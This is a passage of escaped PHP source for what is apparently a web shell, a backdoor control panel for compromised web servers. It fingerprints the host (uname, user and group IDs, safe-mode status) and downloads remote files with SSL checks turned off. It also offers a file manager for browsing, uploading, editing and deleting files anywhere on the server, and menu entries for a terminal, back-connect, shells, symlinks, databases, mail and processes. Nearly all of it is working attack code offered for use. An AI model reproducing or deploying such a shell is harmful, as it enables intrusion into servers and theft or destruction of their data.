MoveRecursive(\$x,\$y)\r\n{\r\n\tif(is_dir(\$x))\r\n\t{\r\n\t\t@mkdir(\$y);\r\n\t\tif(\$h=@opendir(\$x))\r\n\t\t{\r\n\t\t\twhile(false!==(\$f=readdir(\$h)))\r\n\t\t\t{\r\n\t\t\t\tif(\$f!=\".\"&&\$f!=\"..\")\r\n\t\t\t\t{\r\n\t\t\t\t\tMoveRecursive(\$x._.\$f,\$y._.\$f);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tclosedir(\$h);\r\n\t\t}\r\n\t\treturn Remove(\$x);\r\n\t}\r\n\telseif(is_file(\$x))\r\n\t{\r\n\t\tif(copy(\$x,\$y))\r\n\t\t{\r\n\t\t\treturn unlink(\$x);\r\n\t\t}\r\n\t}\r\n\treturn false;\r\n}\r\n\r\nfunction GetDownloadUrl(\$x,\$y)\r\n{\r\n\tglobal \$agent;\r\n\t\$fl=fopen(\$y,\"w\");\r\n\t\$ch=curl_init();\r\n\tcurl_setopt(\$ch,CURLOPT_USERAGENT,\$agent);\r\n\tcurl_setopt(\$ch,CURLOPT_URL,\$x);\r\n\tcurl_setopt(\$ch,CURLOPT_FILE,\$fl);\r\n\tcurl_setopt(\$ch,CURLOPT_HEADER,0);\r\n\tcurl_setopt(\$ch,CURLOPT_SSL_VERIFYHOST,0);\r\n\tcurl_setopt(\$ch,CURLOPT_SSL_VERIFYPEER,0);\r\n\tcurl_setopt(\$ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\$rs=curl_exec(\$ch);\r\n\tif(curl_error(\$ch)) return curl_error(\$ch);\r\n\tcurl_close(\$ch);\r\n\tfclose(\$fl);\r\n\treturn true;\r\n}\r\n\r\nfunction GetUrlExists(\$x)\r\n{\r\n\tglobal \$agent;\r\n\t\$ch=curl_init();\r\n\tcurl_setopt(\$ch,CURLOPT_USERAGENT,\$agent);\r\n\tcurl_setopt(\$ch,CURLOPT_URL,\$x);\r\n\tcurl_setopt(\$ch,CURLOPT_TIMEOUT,5);\r\n\tcurl_setopt(\$ch,CURLOPT_CONNECTTIMEOUT,5);\r\n\tcurl_setopt(\$ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\$rs=curl_exec(\$ch);\r\n\t\$http=curl_getinfo(\$ch,CURLINFO_HTTP_CODE);\r\n\tif(curl_error(\$ch)) return curl_error(\$ch);\r\n\tcurl_close(\$ch);\r\n\treturn (\$http>=200 && \$http<300);\r\n}\r\n\r\nfunction GetUrlContent(\$x)\r\n{\r\n\tglobal \$agent;\r\n\t\$ch=curl_init();\r\n\tcurl_setopt(\$ch,CURLOPT_USERAGENT,\$agent);\r\n\tcurl_setopt(\$ch,CURLOPT_URL,\$x);\r\n\tcurl_setopt(\$ch,CURLOPT_SSL_VERIFYHOST,0);\r\n\tcurl_setopt(\$ch,CURLOPT_SSL_VERIFYPEER,0);\r\n\tcurl_setopt(\$ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\$rs=curl_exec(\$ch);\r\n\tif(curl_error(\$ch)) return curl_error(\$ch);\r\n\tcurl_close(\$ch);\r\n\treturn \$rs;\r\n}\r\n\r\nfunction GetUrlFromPath(\$x)\r\n{\r\n\t\$fix_path=str_replace(_,'/',\$x);\r\n\t\$protocol=empty(\$_SERVER['HTTPS'])||\$_SERVER['HTTPS']==='off'?'http://':'https://';\r\n\t\$path=str_replace(document_root,'',\$fix_path);\r\n\treturn \$protocol.server_name.\$path;\r\n}\r\n\r\nfunction PostUrlContent(\$url,\$content)\r\n{\r\n\tglobal \$agent;\r\n\t\$params=array(\r\n\t\t'http' => array(\r\n\t\t\t'method' => \"POST\",\r\n\t\t\t'header' => \"Content-Type: application/x-www-form-urlencoded\\r\\n\".\r\n\t\t\t\t\t\t \"User-Agent: \$agent\\r\\n\",\r\n\t\t\t'content' => http_build_query(\$content)\r\n\t\t)\r\n\t);\r\n\t\$results=\"\";\r\n\t\$context=stream_context_create(\$params);\r\n\t\$header=get_headers(\$url);\r\n\tif(\$http=substr(\$header[0],9,3) != \"200\")\r\n\t{\r\n\t \$results=\"Error: \$http\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\t//file_get_contents\r\n\t\tif(\$contents=file_get_contents(\$url,null,\$context))\r\n\t\t{\r\n\t\t\t\$results=htmlspecialchars(\$contents);\r\n\t\t}\r\n\r\n\t\t//stream_get_contents\r\n\t\tif(\$handle=fopen(\$url,'r',false,\$context)) \r\n\t\t{\r\n\t\t \$contents=stream_get_contents(\$handle);\r\n\t\t fclose(\$handle);\r\n\t\t \$results=htmlspecialchars(\$contents);\r\n\t\t}\r\n\r\n\t\t//fopen\r\n\t\tif(\$handle=fopen(\$url,'r',false,\$context))\r\n\t\t{\r\n\t\t\t\$contents=\"\";\r\n\t\t\twhile(!feof(\$handle)) \r\n\t\t\t{\r\n\t\t\t\t\$contents.=fread(\$handle,10240);\r\n\t\t\t}\r\n\t\t\tfclose(\$handle);\r\n\t\t\t\$results=htmlspecialchars(\$contents);\r\n\t\t}\r\n\r\n\t}\r\n\treturn \$results;\r\n}\r\n\r\nfunction GetFileType(\$x) \r\n{\r\n\tif(is_file(\$x)) \r\n\t{\r\n\t\treturn pathinfo(\$x)['extension'];\r\n\t}\r\n\telseif(is_dir(\$x)) \r\n\t{ \r\n\t\treturn \"dir\";\r\n\t}\r\n\telseif(is_link(\$x)) \r\n\t{ \r\n\t\treturn \"link\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\treturn \"-\";\r\n\t}\r\n}\r\n\r\nfunction GetFileTime(\$x,\$y) \r\n{\r\n\tswitch(\$y) \r\n\t{\r\n\t\tcase \"create\":return date(\"Y-m-d H:i:s\",@filectime(\$x));break;\r\n\t\tcase \"modify\":return date(\"Y-m-d H:i:s\",@filemtime(\$x));break;\r\n\t\tcase \"access\":return date(\"Y-m-d H:i:s\",@fileatime(\$x));break;\r\n\t}\r\n}\r\n\r\nfunction GetFilePerm(\$x) \r\n{\r\n\t\$perms=@fileperms(\$x);\r\n\tswitch (\$perms & 0xF000) \r\n\t{case 0xC000:\$info='s';break;case 0xA000:\$info='l';break;\r\n\tcase 0x8000:\$info='r';break;case 0x6000:\$info='b';break;\r\n\tcase 0x4000:\$info='d';break;case 0x2000:\$info='c';break;\r\n\tcase 0x1000:\$info='p';break;default:\$info='u';}\r\n\t\$info .=((\$perms & 0x0100)?'r':'-');\$info .=((\$perms & 0x0080)?'w':'-');\r\n\t\$info .=((\$perms & 0x0040)?((\$perms & 0x0800)?'s':'x' ):((\$perms & 0x0800)?'S':'-'));\r\n\t\$info .=((\$perms & 0x0020)?'r':'-');\$info .=((\$perms & 0x0010)?'w':'-');\r\n\t\$info .=((\$perms & 0x0008)?((\$perms & 0x0400)?'s':'x' ):((\$perms & 0x0400)?'S':'-'));\r\n\t\$info .=((\$perms & 0x0004)?'r':'-');\$info .=((\$perms & 0x0002)?'w':'-');\r\n\t\$info .=((\$perms & 0x0001)?((\$perms & 0x0200)?'t':'x' ):((\$perms & 0x0200)?'T':'-'));\r\n\treturn sprintf('%s [%s]',\$info,substr(decoct(\$perms),2));\r\n}\r\n\r\nfunction GetFileSize(\$x) \r\n{\r\n\t\$x=abs(\$x);\r\n\t\$size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');\r\n\t\$exp=\$x?floor(log(\$x)/log(1024)):0;\r\n\treturn sprintf('%.2f '.\$size[\$exp],(\$x/pow(1024,floor(\$exp))));\r\n}\r\n\r\nfunction GetUser(\$x) \r\n{\t\r\n\tif(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) \r\n\t{\r\n\t\t\$uid=posix_getpwuid(posix_getuid());\r\n\t\t\$gid=posix_getgrgid(posix_getgid());\r\n\t\t\r\n\t\tswitch(\$x) \r\n\t\t{\t\r\n\t\t\tcase 'usr':return \$uid['name'];break;\r\n\t\t\tcase 'uid':return \$uid['uid'];break;\r\n\t\t\tcase 'grp':return \$gid['name'];break;\r\n\t\t\tcase 'gid':return \$gid['gid'];break;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tswitch(\$x)\r\n\t\t{\r\n\t\t\tcase 'usr':return get_current_user();break;\r\n\t\t\tcase 'uid':return getmyuid();break;\r\n\t\t\tcase 'grp':return \"?\";break;\r\n\t\t\tcase 'gid':return getmygid();break;\r\n\t\t}\r\n\t}\t\r\n}\r\n\r\nfunction GetOwnerGroup(\$x) \r\n{\r\n\tif(Unix())\r\n\t{\r\n\t\tif(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) \r\n\t\t{\r\n\t\t\t\$user=posix_getpwuid(fileowner(\$x));\r\n\t\t\t\$group=posix_getgrgid(filegroup(\$x));\r\n\t\t\treturn sprintf('%s:%s',\$user['name'],\$group['name']);\r\n\t\t}\r\n\t}\r\n\treturn \"?:?\";\r\n}\r\n\r\nfunction GetFileOwnerGroup(\$x) \r\n{\r\n\tif(Unix())\r\n\t{\r\n\t\tif(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) \r\n\t\t{\r\n\t\t\t\$user=posix_getpwuid(fileowner(\$x));\r\n\t\t\t\$group=posix_getgrgid(filegroup(\$x));\r\n\t\t\treturn sprintf('%s:%s/%s:%s',\$user['name'],\$user['uid'],\$group['name'],\$group['gid']);\r\n\t\t}\r\n\t}\r\n\treturn \"?:?/?:?\";\r\n}\r\n\r\nfunction GetSafeMode() \r\n{\r\n\tif(strtolower(ini_get(\"safe_mode\"))=='on') \r\n\t{\r\n\t\t\$safemod=\"<font class='off'>ON</font>\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\t\$safemod=\"<font class='on'>OFF</font>\";\r\n\t}\r\n\treturn \$safemod;\r\n}\r\n\r\nfunction MapDirectory(\$x) \r\n{\r\n\t\$map=\"\";\r\n\t\$d=str_replace(\"\\\\\",_,\$x);\r\n\tif(empty(\$d))\r\n\t{\r\n\t\t\$d=realpath(\".\");\r\n\t}\r\n\telseif(realpath(\$d))\r\n\t{\t\r\n\t\t\$d=realpath(\$d);\r\n\t}\r\n\t\$d=str_replace(\"\\\\\",_,\$d);\r\n\tif(substr(\$d,-1)!=_) \r\n\t{\t\r\n\t\t\$d.=_;\r\n\t}\r\n\t\$d=str_replace(\"\\\\\\\\\",\"\\\\\",\$d);\r\n\t\$pd=\$e=explode(_,substr(\$d,0,-1));\r\n\t\$i=0;\r\n\tforeach(\$pd as \$b) \r\n\t{\r\n\t\t\$t=\"\";\r\n\t\t\$j=0;\r\n\t\tforeach(\$e as \$r) \r\n\t\t{\r\n\t\t\t\$t.=\$r._;\r\n\t\t\tif(\$j==\$i) \r\n\t\t\t{\t\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\$j++;\r\n\t\t}\r\n\t\t\$map.=\"<a href=\\\"?d=\".urle(\$t).\"\\\" >\".htmlspecialchars(\$b).\"</a>\"._;\r\n\t\t\$i++;\r\n\t}\r\n\treturn rtrim(\$map,_);\r\n}\r\n\r\nfunction MapDrive(\$x) \r\n{\r\n\tif(!Unix()) \r\n\t{\r\n\t\t\$v=explode(\"\\\\\",\$x);\r\n\t\t\$v=\$v[0];\r\n\t\t\$l=\"\";\r\n\t\tforeach(range(\"A\",\"Z\") as \$lt) \r\n\t\t{\r\n\t\t\t\$drive=is_dir(\$lt.\":\\\\\");\r\n\t\t\tif(\$drive) \r\n\t\t\t{\r\n\t\t\t\t\$l.=\"<a href=\\\"?d=\".urle(\$lt.\":\\\\\").\"\\\">[\";\r\n\t\t\t\tif(strtolower(\$lt.':')!=strtolower(\$v)) \r\n\t\t\t\t{\r\n\t\t\t\t\t\$l.=\$lt;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$l.=\"<font color=\\\"orange\\\"><b>\".\$lt.\"</b></font>\";\r\n\t\t\t\t}\r\n\t\t\t\t\$l.=\"]</a>\";\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn \$l;\r\n\t}\r\n}\r\n\r\nfunction MainMenu() \r\n{\r\n\t\$menu=array(\r\n\t\t\"ExpL\" => \"?d=\".urle(getcwd()),\r\n\t\t\"★ Sec.\"\t=> \"?x=secure\",\r\n\t\t\"Info\" => \"?x=info\",\r\n\t\t\"Database\" => \"?x=db\",\r\n\t\t\"Terminal\" => \"?x=terminal\",\r\n\t\t\"Connect\" => \"?x=connect\",\r\n\t\t\".Htaccess\" => \"?x=htaccess\",\r\n\t\t\"PHP\" => \"?x=php\",\r\n\t\t\"Perl/CGI\" => \"?x=perl\",\r\n\t\t\"Mail\" => \"?x=mail\",\r\n\t\t\"Process\" => \"?x=process\",\r\n\t\t\"Shells\" => \"?x=shells\",\r\n\t\t\"Symlink\" => \"?x=symlink\",\r\n\t\t\"♛ Tools\" => \"?z\",\r\n\t\t\"Account\" => \"?x=account\",\r\n\t\t\"Update\" => \"?x=update\",\r\n\t\t\"Logout\" => \"?x=logout\"\r\n\t);\r\n\t\$nu=\"\";\r\n\tforeach(\$menu as \$key => \$val)\r\n\t{\r\n\t\t\$idxkey=substr(\$val,1,1);\r\n\t\t\$idxval=substr(\$val,3);\r\n\t\t\$active=any(\$idxkey,\$_REQUEST)&&\$_REQUEST[\$idxkey]==\$idxval?\"class='active'\":\"\";\r\n\t\tif(\$key==\"Logout\")\r\n\t\t{\r\n\t\t\t\$nu.=\"<li><a \".\$active.\" href='\".\$val.\"' onclick=\\\"return confirm('Bye !');\\\">\".\$key.\"</a></li>\";\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\$nu.=\"<li><a \".\$active.\" href='\".\$val.\"'>\".\$key.\"</a></li>\";\r\n\t\t}\r\n\t}\r\n\treturn \$nu;\r\n}\r\n\r\nfunction MenuTools(\$x) \r\n{\r\n\tglobal \$menu_tools;\r\n\t\$ol=\"<div class='menu-tools'><ul>\";\r\n\t\$menu_tools=\$x;\r\n\t\r\n\tforeach(\$menu_tools as \$k => \$v)\r\n\t{\r\n\t\t\$active=\$_REQUEST['z']==\$k?\"class='active'\":\"\";\r\n\t\t\$ol.=\"<li><a \".\$active.\" href='?z=\".\$k.\"'>[\".\$v['title'].\"]</a></li>\";\r\n\t}\r\n\t\$ol.=\"</ul></div>\";\r\n\treturn \$ol;\r\n}\r\n\r\nprintf(\"<div id='header'>\r\n\t\t<div class='header-left'>\r\n\t\t\t<div id='info'>\r\n\t\t\t\t<font class='on'>[%s]</font><br>\r\n\t\t\t\t<font class='on'>[%s]</font><br>\r\n\t\t\t\t[<a href='//%s' target='_blank'>%s</a>]: <font class='on'>%s:%s</font> [%s]: <font class='on'>%s:%s</font><br>\r\n\t\t\t\t[USER]: <font class='on'>%s(%s)</font> [GROUP]: <font class='on'>%s(%s)</font><br>\r\n\t\t\t\t[HDD]: <font class='on'>%s</font> / <font class='on'>%s</font><br>\r\n\t\t\t\t[PHPMODE]: <font class='on'>%s</font><br>\r\n\t\t\t\t[SAFEMODE]: <font class='on'>%s</font><br>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t\t<div class='header-right'>\r\n\t\t\t<a href='%s'><div id='logo'>\r\n\t\t\t\t<h1 id='title'>%s</h1>\r\n\t\t\t\t<div class='line'></div>\r\n\t\t\t\t<h2 id='subtitle'>%s</h2>\r\n\t\t\t</div></a>\r\n\t\t</div>\r\n\t\t<div class='clr'></div>\r\n\t\t</div>\r\n\t\t<div id='container'>\r\n\t\t<div class='menu'>\r\n\t\t\t<ul>%s</ul>\r\n\t\t</div>\r\n\t\t<div class='menu-directory'>\r\n\t\t\t<div class='map-switch'>\r\n\t\t\t\t<input type='submit' name='map-switch' value='♞' onclick='mapSwitch(\\\"map1\\\",\\\"map2\\\")'>\r\n\t\t\t</div>\r\n\t\t\t<div class='map1' id='map1' style='display:inline-block'>\r\n\t\t\t\t<span style='margin-right:5px'>%s</span>\r\n\t\t\t\t<span style='margin-right:5px'>%s</span>\r\n\t\t\t</div>\r\n\t\t\t<div class='map2' id='map2' style='display:none'>\r\n\t\t\t\t<form method='post' id='map2-form' onsubmit='document.getElementById(\\\"map2-form\\\").action=\\\"?g=\\\" + encodeURI(document.getElementById(\\\"map2-input\\\").value);'>\r\n\t\t\t\t\t<input type='text' value='%s' id='map2-input'/>\r\n\t\t\t\t\t<input type='submit' value='Go'>\r\n\t\t\t\t</form>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t\t<div class='content'>\",\r\n\t\tphp_uname(),server_software,\r\n\t\tserver_name,server_name,gethostbyname(http_host),server_port,\r\n\t\tB64D(\$account[0]),remote_addr,remote_port,\r\n\t\tGetUser(\"usr\"),GetUser(\"uid\"),GetUser(\"grp\"),GetUser(\"gid\"),\r\n\t\tGetFileSize(@disk_free_space(\$dir)),GetFileSize(@disk_total_space(\$dir)),\r\n\t\tphp_sapi_name(),GetSafeMode(),php_self,\$config['title'],\$config['subtitle'],\r\n\t\tMainMenu(),MapDrive(\$map),MapDirectory(\$map),\$map\r\n);\r\n\r\nif(any(\"g\",\$_REQUEST))\r\n{\r\n\t\$g=\$_REQUEST['g'];\r\n\r\n\tif (is_dir(\$g))\r\n\t{\r\n\t\theader('location:'.php_self.'?d='.urle(\$g));\r\n\t}\r\n\telseif(is_file(\$g)||is_link(\$g))\r\n\t{\r\n\t\theader('location:'.php_self.'?a=v&r='.urle(\$g));\r\n\t}\r\n\telse\r\n\t{\r\n\t\theader('location:'.php_self);\r\n\t}\r\n}\r\n\r\nif(any(\"d\",\$_REQUEST)||request_uri===script_name)\r\n{\r\n\t\$_SESSION['c']=urle(\$dir);\r\n\r\n\tif(any(\"file\",\$_REQUEST)&&\$_REQUEST['file']==\"New File\")\r\n\t{\r\n\t\t\$file=trim(\$dir._.\$_REQUEST['what']);\r\n\t\t\r\n\t\tif(file_exists(\$file))\r\n\t\t{\r\n\t\t\tprintf(\"<center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center>\");\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\$mf=@fopen(\$file,\"w\");\r\n\t\t\tfclose(\$mf);\r\n\t\t\theader(\"location:\".php_self.\"?a=e&r=\".urle(\$file));\r\n\t\t}\r\n\t}\r\n\tif(any(\"directory\",\$_REQUEST)&&\$_REQUEST['directory']==\"New Dir\")\r\n\t{\t\r\n\t\t\$dire=trim(\$_REQUEST['what']);\r\n\r\n\t\t@chdir(\$dir);\r\n\r\n\t\tif(!@mkdir(\$dire))\r\n\t\t{\r\n\t\t\tprintf(\"<center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center>\");\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprintf(\"<center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center>\",\$dire,GetFileTime(\$dir._.\$dire,'create'));\r\n\t\t}\r\n\t}\r\n\tif(any(\"upload\",\$_REQUEST)&&\$_REQUEST['upload']==\"Upload\")\r\n\t{\t\r\n\t\t\$upload=\$dir._.trim(basename(\$_FILES[\"what\"][\"name\"]));\r\n\r\n\t\tif(move_uploaded_file(\$_FILES[\"what\"][\"tmp_name\"],\$upload)) \r\n\t\t{\r\n\t\t\tprintf(\"<center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center>\",basename(\$_FILES[\"what\"][\"name\"]));\r\n\t\t}\r\n\t\telse \r\n\t\t{\r\n\t\t\tprintf(\"<center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center>\");\r\n\t\t}\r\n\t}\r\n\tif(\$handle=@opendir(\$dir))\r\n\t{\r\n\t\t\$reads=array();\r\n\t\t\$count_dirs=0;\r\n\t\t\$count_files=0;\r\n\r\n\t\twhile(false!==(\$file=readdir(\$handle)))\r\n\t\t{\r\n\t\t\t\$filedir=rtrim(\$dir,_)._.\$file;\r\n\t\t\t\$updir=substr(\$dir,0,strrpos(\$dir,_));\r\n\t\t\tif (strlen(\$updir)<=2) \$updir=\$updir._;\r\n\t\t\t\$type=GetFileType(\$filedir);\r\n\t\t\t\$size=GetFileSize(@filesize(\$filedir));\r\n\t\t\t\$last=GetFileTime(\$filedir,\"modify\");\r\n\t\t\t\$perm=GetFilePerm(\$filedir);\r\n\t\t\t\$owner=GetOwnerGroup(\$filedir);\r\n\t\t\t\$mime=@mime_content_type(\$filedir);\r\n\t\t\t\$view=\"\";\r\n\r\n\t\t\tif(strpos(\$mime,'image')!==false)\r\n\t\t\t{\r\n\t\t\t\t\$view=\"?a=v&w=i&r=\".urle(\$filedir);\r\n\t\t\t}\r\n\t\t\telseif(strpos(\$mime,'video')!==false)\r\n\t\t\t{\r\n\t\t\t\t\$view=\"?a=v&w=v&r=\".urle(\$filedir);\r\n\t\t\t}\r\n\t\t\telseif(strpos(\$mime,'audio')!==false)\r\n\t\t\t{\r\n\t\t\t\t\$view=\"?a=v&w=a&r=\".urle(\$filedir);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$view=\"?a=v&r=\".urle(\$filedir);\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tif(\$file==\".\")\r\n\t\t\t{\r\n\t\t\t\t\$reads[]=\"<tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value='\".urle(\$dir).\"'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Current Directory' href='?d=\".urle(\$dir).\"'>.</a></td><td><center>\".strtoupper(\$type).\"</center></td><td><center>\".\$size.\"</center></td><td><center>\".\$perm.\"</center></td><td><center>\".\$owner.\"</center></td><td><center>\".\$last.\"</center></td><td><a class='action' href='?a=x&r=\".urle(\$dir).\"' onclick=\\\"return confirm('Delete Directory [ /\".basename(\$dir).\" ] ?');\\\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=\".urle(\$dir).\"' title='Modify Folder'>ℳ</a></td></tr>\";\r\n\t\t\t}\r\n\t\t\telseif(\$file==\"..\")\r\n\t\t\t{\r\n\t\t\t\t\$reads[]=\"<tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value='\".urle(\$updir).\"'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAmlJREFUeNpsU0toU0EUPfPysx/tTxuDH9SCWhUDooIbd7oRUUTMouqi2iIoCO6lceHWhegy4EJFinWjrlQUpVm0IIoFpVDEIthm0dpikpf3ZuZ6Z94nrXhhMjM3c8895977BBHB2PznK8WPtDgyWH5q77cPH8PpdXuhpQT4ifR9u5sfJb1bmw6VivahATDrxcRZ2njfoaMv+2j7mLDn93MPiNRMvGbL18L9IpF8h9/TN+EYkMffSiOXJ5+hkD+PdqcLpICWHOHc2CC+LEyA/K+cKQMnlQHJX8wqYG3MAJy88Wa4OLDvEqAEOpJd0LxHIMdHBziowSwVlF8D6QaicK01krw/JynwcKoEwZczewroTvZirlKJs5CqQ5CG8pb57FnJUA0LYCXMX5fibd+p8LWDDemcPZbzQyjvH+Ki1TlIciElA7ghwLKV4kRZstt2sANWRjYTAGzuP2hXZFpJ/GsxgGJ0ox1aoFWsDXyyxqCs26+ydmagFN/rRjymJ1898bzGzmQE0HCZpmk5A0RFIv8Pn0WYPsiu6t/Rsj6PauVTwffTSzGAGZhUG2F06hEc9ibS7OPMNp6ErYFlKavo7MkhmTqCxZ/jwzGA9Hx82H2BZSw1NTN9Gx8ycHkajU/7M+jInsDC7DiaEmo1bNl1AMr9ASFgqVu9MCTIzoGUimXVAnnaN0PdBBDCCYbEtMk6wkpQwIG0sn0PQIUF4GsTwLSIFKNqF6DVrQq+IWVrQDxAYQC/1SsYOI4pOxKZrfifiUSbDUisif7XlpGIPufXd/uvdvZm760M0no1FZcnrzUdjw7au3vu/BVgAFLXeuTxhTXVAAAAAElFTkSuQmCC'/> <a title='Parent Directory' href='?d=\".urle(\$updir).\"'>\".\$file.\"</a></td><td><center>\".strtoupper(\$type).\"</center></td><td><center>\".\$size.\"</center></td><td><center>\".\$perm.\"</center></td><td><center>\".\$owner.\"</center></td><td><center>\".\$last.\"</center></td><td><a class='action' href='?a=x&r=\".urle(\$updir).\"' onclick=\\\"return confirm('Delete Directory [ /\".basename(\$updir).\" ] ?');\\\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=\".urle(\$updir).\"' title='Modify Folder'>ℳ</a></td></tr>\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tif(\$type==\"dir\")\r\n\t\t\t\t{\r\n\t\t\t\t\t\$reads[]=\"<tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value='\".urle(\$filedir).\"' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Open Directory' href='?d=\".urle(\$filedir).\"'>\".\$file.\"</a></td><td><center>\".strtoupper(\$type).\"</center></td><td><center>\".\$size.\"</center></td><td><center>\".\$perm.\"</center></td><td><center>\".\$owner.\"</center></td><td><center>\".\$last.\"</center></td><td><a class='action' href='?a=x&r=\".urle(\$filedir).\"' onclick=\\\"return confirm('Delete Directory [ /\".basename(\$filedir).\" ] ?');\\\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=\".urle(\$filedir).\"' title='Modify Folder'>ℳ</a></td></tr>\";\r\n\t\t\t\t\t\$count_dirs++;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$reads[]=\"<tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value='\".urle(\$filedir).\"' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAABnRSTlMAAAAAAABupgeRAAABHUlEQVR42o2RMW7DIBiF3498iHRJD5JKHurL+CRVBp+i2T16tTynF2gO0KSb5ZrBBl4HHDBuK/WXACH4eO9/CAAAbdvijzLGNE1TVZXfZuHg6XCAQESAZXbOKaXO57eiKG6ft9PrKQIkCQqFoIiQFBGlFIB5nvM8t9aOX2Nd18oDzjnPgCDpn/BH4zh2XZdlWVmWiUK4IgCBoFMUz9eP6zRN75cLgEQhcmTQIbl72O0f9865qLAAsURAAgKBJKEtgLXWvyjLuFsThCSstb8rBCaAQhDYWgIZ7myM+TUBjDHrHlZcbMYYk34cN0YSLcgS+wL0fe9TXDMbY33fR2AYBvyQ8L0Gk8MwREBrTfKe4TpTzwhArXWi8HI84h/1DfwI5mhxJamFAAAAAElFTkSuQmCC'> <a title='View File' href='\".\$view.\"'>\".\$file.\"</a></td><td><center>\".strtoupper(\$type).\"</center></td><td><center>\".\$size.\"</center></td><td><center>\".\$perm.\"</center></td><td><center>\".\$owner.\"</center></td><td><center>\".\$last.\"</center></td><td><a class='action' href='?a=e&r=\".urle(\$filedir).\"' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r=\".urle(\$filedir).\"' onclick=\\\"return confirm('Delete Filename [ 